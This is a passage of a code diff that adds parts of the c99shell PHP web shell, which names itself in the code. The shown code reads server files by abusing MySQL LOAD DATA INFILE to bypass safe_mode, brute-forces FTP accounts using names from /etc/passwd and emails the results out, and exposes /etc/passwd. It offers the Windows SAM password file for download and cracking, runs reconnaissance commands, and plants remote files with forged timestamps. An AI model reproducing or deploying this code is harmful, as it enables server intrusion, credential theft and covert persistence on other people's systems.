+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
+ echo "<center>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
+ }
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></center></form>";
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
+}
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "search"){
+ echo "<b>Search in file-system:</b><br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Search\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
